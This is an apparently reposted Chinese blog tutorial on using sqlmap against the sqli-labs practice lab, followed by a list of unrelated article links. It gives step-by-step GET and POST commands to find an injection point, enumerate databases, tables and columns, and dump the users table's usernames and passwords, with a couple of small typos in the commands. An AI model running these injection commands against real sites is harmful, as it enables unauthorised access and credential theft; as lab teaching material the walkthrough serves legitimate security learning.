当前位置: 首页 > article >正文

sqlmap使用(以sqli-lab为例)

1.get使用方法:(Less-1 **Error Based- String**)

1.查看是否有注入点:sqlmap -u 网址
2.爆出数据库名:sqlmap -u 网址 --dbs
3.爆出数据库表名  sqlmap -u 网址 -D 'security' --tables
4.爆出指定表的列名:  sqlmap -u 网址 -D 'security' -T 'users' --columns
5.dump出数据:sqlmap -u -D security -T users -C id,password,username --dump

2.post使用方法:(Less-11- Error Based- String)
1.使用burp抓包,将请求内容保存在txt文件中(或者使用-u 网址 --data ‘data’来代替)
sqlmap -r   文件位置
2.爆出数据库名:sqlmap -r 文件位置 --dbs
3.爆出表名:sqlmap -r 文件位置 -D XXX --tables
4.爆出列名:sqlmap -r 文件位置 -D xxx -T xxx -columns
5.dump出数据: sqlmap -r 文件位置 -D xxx -T xxx -C xxx --dump

Less-12- Error Based- Double quotes- String

参考链接:

详细sqli-labs(1-65)通关讲解_数据库_糊涂是福yyyy-DevPress官方社区 (csdn.net)


http://www.kler.cn/news/9440.html

相关文章:

  • 【Leetcode之路 | Java Python】两数之和(暴力枚举哈希表)
  • 基于发票增值税OCR API设计自动识别应用系统,从此解放财务双手
  • 【图像分割】Segment Anything(Meta AI)论文解读
  • 经典文献阅读之--Bidirectional Camera-LiDAR Fusion(Camera-LiDAR双向融合新范式)
  • Java -- System类和冒泡排序
  • SpringBoot集成ChatGPT实现AI聊天
  • 护眼灯真的可以保护眼睛吗?推荐五款达到护眼级别的灯
  • SVN
  • C/C++每日一练(20230412)
  • 全国青少年信息素养大赛Python编程挑战赛初赛试题说明
  • AI助手帮你轻松做好Imagenet数据集重命名与复制
  • 本明杰富兰克林自律十三条
  • 【NLP入门教程】三、词性标注
  • KNN、SVM、MLP、K-means分类实验
  • chapter-4-数据库语句
  • 一般形式的S曲线公式推导
  • 项目的总结
  • OpenCV基础之边缘检测与轮廓描绘
  • VScode 自动格式化配置
  • 【启动图片与控制器大小的关系 Objective-C语言】
  • Vite构建Vue3项目
  • PHP请求商品详情类API接口( 获得淘宝商品详情, 获得淘宝商品详情高级版,获得淘宝商品评论, 获得淘宝商品快递费用
  • 存量市场之下,电商之战深入腹地且逻辑未变
  • 针对近日ChatGPT账号大批量封禁的理性分析
  • 前端测试指南:Vue3 测试工具介绍与使用
  • mysql date/datetime/timestamp and timezone
  • 模拟Redisson获取锁 释放锁 锁续命
  • 软件测试今天你被内卷了吗?
  • 【LeetCode每日一题: 516. 最长回文子序列 | 暴力递归=>记忆化搜索=>动态规划 | 区间dp 】
  • 【华为OD机试】1035 - 判断两个IP是否属于同一子网